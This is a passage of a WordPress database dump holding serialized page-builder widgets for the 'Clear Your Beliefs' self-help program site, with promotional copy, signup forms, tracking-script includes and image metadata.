15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em style="margin-left: -6px;">What do I want to experience?</em></li>\n	<li><em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em></li>\n	<li><em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:525:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n<hr id="lines"/>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1410, 1849, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1466:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input required id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input required id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2142:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form style="position: relative; top: 10px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form style="position: relative; bottom: -2px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1459:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><big><strong><u>Clear Your Limiting</u>\nand Negative Beliefs</strong></big> <big><strong>\n- Permanently!</strong></big>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<form target="_blank" class="infusion-form rd-form-1 rd-form-1-3rd" style="position: relative; bottom: 15px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2893:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em style="margin-left: -6px;">What do I want to experience?</em></li>\n	<li><em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em></li>\n	<li><em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:542:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center; margin: 0px 5%;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n\n<hr id="lines"/>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1411, 1851, '_wp_attached_file', '2014/10/iclearit-App-logo_600.jpg'),
(1412, 1851, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:600;s:6:"height";i:690;s:4:"file";s:33:"2014/10/iclearit-App-logo_600.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"iclearit-App-logo_600-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"iclearit-App-logo_600-260x300.jpg";s:5:"width";i:260;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:33:"iclearit-App-logo_600-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:33:"iclearit-App-logo_600-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:33:"iclearit-App-logo_600-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:33:"iclearit-App-logo_600-600x372.jpg";s:5:"width";i:600;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}s:25:"twentyfourteen-full-width";a:4:{s:4:"file";s:33:"iclearit-App-logo_600-600x576.jpg";s:5:"width";i:600;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1413, 1852, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1466:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input required id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input required id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2149:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_600-260x300.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form style="position: relative; top: 10px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form style="position: relative; bottom: -2px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1459:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><big><strong><u>Clear Your Limiting</u>\nand Negative Beliefs</strong></big> <big><strong>\n- Permanently!</strong></big>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<form target="_blank" class="infusion-form rd-form-1 rd-form-1-3rd" style="position: relative; bottom: 15px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2893:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em style="margin-left: -6px;">What do I want to experience?</em></li>\n	<li><em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em></li>\n	<li><em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:542:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center; margin: 0px 5%;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the 